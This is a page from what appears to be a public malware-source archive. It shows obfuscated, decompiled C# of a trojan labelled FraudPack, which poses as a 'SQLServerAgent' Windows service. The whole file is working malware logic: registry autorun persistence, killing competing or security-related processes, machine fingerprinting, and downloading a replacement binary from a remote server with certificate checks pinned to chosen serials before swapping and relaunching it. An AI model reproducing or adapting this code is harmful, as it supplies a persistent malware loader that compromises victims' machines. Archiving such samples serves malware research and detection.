daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 00:09:23 +00:00
Code Issues Projects Releases Wiki Activity
Files
2e3da99359ad4795878adccc0f2722bb233692c3
MalwareSourceCode/MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/_0005.cs
T
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

500 lines
14 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: 
// Assembly: SQLServerAgent, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 64EBCD24-503A-45A7-A91C-C993E34BC26D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Net;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.ServiceProcess;
using System.Text;
using System.Threading;
using System.Timers;
public sealed class \u0005 : ServiceBase
{
private string \u0002;
private bool \u0003 = false;
private bool \u0005 = false;
private string \u0008;
private string \u0006;
private string \u000E;
private string \u000F;
private int \u0002\u2000;
private string \u0003\u2000 = string.Empty;
private bool \u0005\u2000 = false;
private System.Timers.Timer \u0008\u2000 = new System.Timers.Timer(30000.0);
private IContainer \u0006\u2000 = (IContainer) null;
private BackgroundWorker \u000E\u2000;
private BackgroundWorker \u000F\u2000;
public \u0005() => this.\u000E();
protected override void OnStart(string[] _param1)
{
this.\u0008();
this.\u0002();
this.\u0002 = \u0005.\u0002();
this.\u0003();
this.\u0005();
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(\u0008.\u0002(1356208489), RegistryKeyPermissionCheck.ReadWriteSubTree);
this.\u0002\u2000 = (int) subKey.GetValue(\u0008.\u0002(1356208422));
subKey.Close();
System.Timers.Timer timer1 = new System.Timers.Timer(1000.0);
timer1.Elapsed += new ElapsedEventHandler(this.\u0005);
timer1.AutoReset = true;
timer1.Enabled = true;
this.\u0008\u2000.Elapsed += new ElapsedEventHandler(this.\u0003);
this.\u0008\u2000.AutoReset = true;
this.\u0008\u2000.Enabled = false;
System.Timers.Timer timer2 = new System.Timers.Timer(60000.0);
timer2.Elapsed += new ElapsedEventHandler(this.\u0002);
timer2.AutoReset = true;
timer2.Enabled = true;
}
private void \u0002()
{
try
{
this.\u0002(\u0008.\u0002(1356208433));
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(\u0008.\u0002(1356208444), RegistryKeyPermissionCheck.ReadWriteSubTree);
registryKey.DeleteValue(\u0008.\u0002(1356208433));
registryKey.Close();
System.IO.File.Delete(Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]) + \u0008.\u0002(1356208368));
}
catch
{
}
}
private void \u0002(object _param1, ElapsedEventArgs _param2)
{
if (this.\u0005\u2000)
return;
this.\u0005();
}
private string \u0002(string _param1)
{
if (!System.IO.File.Exists(_param1))
return string.Empty;
StringBuilder stringBuilder = new StringBuilder();
try
{
FileStream inputStream = new FileStream(_param1, FileMode.Open, FileAccess.Read, FileShare.ReadWrite);
byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream);
inputStream.Close();
for (int index = 0; index < hash.Length; ++index)
stringBuilder.Append(hash[index].ToString(\u0008.\u0002(1356208348)));
}
catch
{
return string.Empty;
}
return stringBuilder.ToString();
}
private void \u0003()
{
try
{
this.\u0008 = this.\u0003(\u0008.\u0002(1356208293) + this.\u0003\u2000 + \u0008.\u0002(1356208257)).Split('-')[0];
}
catch
{
}
}
private void \u0005() => this.\u000E = this.\u0002(Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]) + \u0008.\u0002(1356208275));
private static string \u0002()
{
string empty = string.Empty;
foreach (ManagementObject instance in new ManagementClass(\u0008.\u0002(1356208197)).GetInstances())
{
if (empty == string.Empty)
{
empty = instance.Properties[\u0008.\u0002(1356208219)].Value.ToString();
break;
}
}
string str1 = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
ManagementObject managementObject = new ManagementObject(\u0008.\u0002(1356208173) + str1 + \u0008.\u0002(1356208144));
managementObject.Get();
string str2 = managementObject[\u0008.\u0002(1356208153)].ToString();
byte[] hash = MD5.Create().ComputeHash(Encoding.Default.GetBytes(empty + str2));
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hash.Length; ++index)
stringBuilder.Append(hash[index].ToString(\u0008.\u0002(1356208348)));
return stringBuilder.ToString();
}
private string \u0003(string _param1)
{
try
{
ServicePointManager.CertificatePolicy = (ICertificatePolicy) new \u0005.\u0002();
StringBuilder stringBuilder = new StringBuilder();
byte[] numArray = new byte[8192];
Stream responseStream = WebRequest.Create(_param1).GetResponse().GetResponseStream();
int count;
do
{
count = responseStream.Read(numArray, 0, numArray.Length);
if (count != 0)
{
string str = Encoding.ASCII.GetString(numArray, 0, count);
stringBuilder.Append(str);
}
}
while (count > 0);
responseStream.Flush();
return stringBuilder.ToString();
}
catch
{
return _param1.IndexOf(\u0008.\u0002(1356208293)) != -1 ? this.\u0003(_param1.Replace(\u0008.\u0002(1356209138), \u0008.\u0002(1356209101))) : string.Empty;
}
}
private void \u0002(string _param1)
{
foreach (Process process in Process.GetProcessesByName(_param1))
process.Kill();
}
private void \u0008()
{
try
{
if (!System.IO.File.Exists(\u0008.\u0002(1356209061)))
return;
this.\u0003\u2000 = \u0008.\u0002(1356209033);
}
catch
{
}
}
private string \u0002()
{
TextReader textReader = (TextReader) new StreamReader(\u0008.\u0002(1356209041));
string end = textReader.ReadToEnd();
textReader.Close();
return end;
}
private bool \u0002(string _param1, string _param2)
{
TextWriter textWriter = (TextWriter) new StreamWriter(\u0008.\u0002(1356209003) + _param1 + \u0008.\u0002(1356209013));
textWriter.WriteLine(_param2);
textWriter.Close();
return true;
}
private bool \u0003(string _param1, string _param2)
{
try
{
ServicePointManager.CertificatePolicy = (ICertificatePolicy) new \u0005.\u0002();
byte[] buffer = new byte[8192];
Stream responseStream = WebRequest.Create(_param1).GetResponse().GetResponseStream();
FileStream output = new FileStream(_param2, FileMode.OpenOrCreate);
BinaryWriter binaryWriter = new BinaryWriter((Stream) output);
int count;
do
{
count = responseStream.Read(buffer, 0, buffer.Length);
if (count != 0)
binaryWriter.Write(buffer, 0, count);
}
while (count > 0);
responseStream.Flush();
binaryWriter.Close();
output.Close();
return true;
}
catch
{
return _param1.IndexOf(\u0008.\u0002(1356208293)) != -1 && this.\u0003(_param1.Replace(\u0008.\u0002(1356209138), \u0008.\u0002(1356208960)), _param2);
}
}
private void \u0006()
{
if (this.\u0008 != this.\u000E || this.\u0008 == string.Empty)
this.\u0003();
if (!(this.\u0008 != this.\u000E) || !(this.\u0008 != string.Empty))
return;
this.\u0003 = true;
string tempPath = Path.GetTempPath();
this.\u000E\u2000.RunWorkerAsync((object) new string[2]
{
\u0008.\u0002(1356208985) + this.\u0003\u2000 + \u0008.\u0002(1356208948),
tempPath + \u0008.\u0002(1356208920)
});
}
public void \u0005\u2004\u2006\u2009\u2001\u2009\u2009\u2004\u2001\u2001\u2003\u2001\u2008\u2008\u2003\u200A\u2001()
{
string[] strArray1 = new string[1]
{
\u0008.\u0002(1356208871)
};
string[] strArray2 = new string[2]
{
\u0008.\u0002(1356208892),
\u0008.\u0002(1356208846)
};
string[] strArray3 = new string[2]
{
\u0008.\u0002(1356208800),
\u0008.\u0002(1356208815)
};
string[] strArray4 = new string[1]
{
\u0008.\u0002(1356208772)
};
string[] strArray5 = new string[1]
{
\u0008.\u0002(1356208795)
};
string[] strArray6 = new string[1]
{
\u0008.\u0002(1356208758)
};
string[] strArray7 = new string[2]
{
\u0008.\u0002(1356208719),
\u0008.\u0002(1356208735)
};
string[] strArray8 = new string[2]
{
\u0008.\u0002(1356208719),
\u0008.\u0002(1356208688)
};
string[] strArray9 = new string[3]
{
\u0008.\u0002(1356208640),
\u0008.\u0002(1356208655),
\u0008.\u0002(1356208670)
};
string[][] strArray10 = new string[10][]
{
strArray1,
strArray2,
strArray3,
strArray4,
strArray5,
strArray6,
strArray7,
strArray8,
strArray9,
strArray1
};
foreach (Process process in Process.GetProcesses())
{
try
{
string directoryName = Path.GetDirectoryName(process.MainModule.FileName);
string fileName = Path.GetFileName(process.MainModule.FileName);
string mainWindowTitle = process.MainWindowTitle;
if (mainWindowTitle.IndexOf(\u0008.\u0002(1356209645)) != -1 || mainWindowTitle.IndexOf(\u0008.\u0002(1356209661)) != -1 || fileName.IndexOf(\u0008.\u0002(1356209614)) != -1)
{
process.Kill();
}
else
{
for (int index1 = 0; index1 < strArray10.Length; ++index1)
{
string[] strArray11 = strArray10[index1];
bool flag = true;
for (int index2 = 0; index2 < strArray11.Length; ++index2)
{
string str = strArray11[index2];
if (!System.IO.File.Exists(directoryName + \u0008.\u0002(1356209568) + str))
{
flag = false;
break;
}
}
if (flag)
{
process.Kill();
break;
}
}
}
}
catch
{
}
}
}
private bool \u0002()
{
string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1356209576));
bool flag = false;
for (int index = 0; index < processesByName.Length; ++index)
{
if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1356208275))
processesByName[index].Kill();
else if (processesByName[index].MainWindowHandle.ToInt32() != 0)
flag = true;
else
processesByName[index].Kill();
}
return flag;
}
private void \u0003(object _param1, ElapsedEventArgs _param2)
{
this.\u0005\u2000 = false;
this.\u0008\u2000.Enabled = false;
}
private void \u0005(object _param1, ElapsedEventArgs _param2)
{
string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
if (System.IO.File.Exists(str + \u0008.\u0002(1356209593)))
{
try
{
System.IO.File.Delete(str + \u0008.\u0002(1356209593));
}
catch
{
}
this.\u0002(\u0008.\u0002(1356208433));
this.\u0005\u2000 = true;
this.\u0008\u2000.Enabled = true;
}
if (this.\u0005\u2000)
return;
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(\u0008.\u0002(1356208444), RegistryKeyPermissionCheck.ReadWriteSubTree);
string empty1 = string.Empty;
string empty2 = string.Empty;
try
{
empty1 = (string) registryKey.GetValue(\u0008.\u0002(1356209512));
}
catch
{
}
try
{
if (empty1 != str + \u0008.\u0002(1356208275))
{
registryKey.CreateSubKey(\u0008.\u0002(1356209512));
registryKey.SetValue(\u0008.\u0002(1356209512), (object) (str + \u0008.\u0002(1356208275)));
}
}
catch
{
}
registryKey.Close();
if (this.\u0003)
return;
this.\u0006();
if (this.\u0003)
return;
Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1356209576));
bool flag = false;
for (int index = 0; index < processesByName.Length; ++index)
{
if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1356208275))
processesByName[index].Kill();
else
flag = true;
}
if (flag)
return;
try
{
Process.Start(str + \u0008.\u0002(1356208275));
}
catch
{
}
}
protected override void OnStop()
{
}
private void \u0002(object _param1, DoWorkEventArgs _param2)
{
}
private void \u0003(object _param1, DoWorkEventArgs _param2)
{
string[] strArray = (string[]) _param2.Argument;
string str1 = strArray[0];
string sourceFileName = strArray[1];
if (this.\u0003(str1, sourceFileName))
{
Path.GetTempPath();
string str2 = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
this.\u0002(\u0008.\u0002(1356208433));
this.\u0002(\u0008.\u0002(1356209576));
Thread.Sleep(3000);
try
{
if (System.IO.File.Exists(str2 + \u0008.\u0002(1356208275)))
System.IO.File.Delete(str2 + \u0008.\u0002(1356208275));
if (!Directory.Exists(str2 + \u0008.\u0002(1356209527)))
Directory.CreateDirectory(str2 + \u0008.\u0002(1356209527));
System.IO.File.Move(sourceFileName, str2 + \u0008.\u0002(1356208275));
}
catch
{
}
this.\u000E = this.\u0008;
}
this.\u0003 = false;
}
private void \u0005(object _param1, DoWorkEventArgs _param2)
{
}
protected override void Dispose(bool _param1)
{
if (_param1 && this.\u0006\u2000 != null)
this.\u0006\u2000.Dispose();
base.Dispose(_param1);
}
private void \u000E()
{
this.\u000E\u2000 = new BackgroundWorker();
this.\u000F\u2000 = new BackgroundWorker();
this.\u000E\u2000.DoWork += new DoWorkEventHandler(this.\u0003);
this.\u000F\u2000.DoWork += new DoWorkEventHandler(this.\u0005);
this.ServiceName = \u0008.\u0002(1356208604);
}
public sealed class \u0002 : ICertificatePolicy
{
public bool CheckValidationResult(
ServicePoint _param1,
X509Certificate _param2,
WebRequest _param3,
int _param4)
{
string serialNumberString = _param2.GetSerialNumberString();
return !(serialNumberString != \u0008.\u0002(1356208567)) || !(serialNumberString != \u0008.\u0002(1356208528));
}
}
}
Reference in New Issue View Git Blame Copy Permalink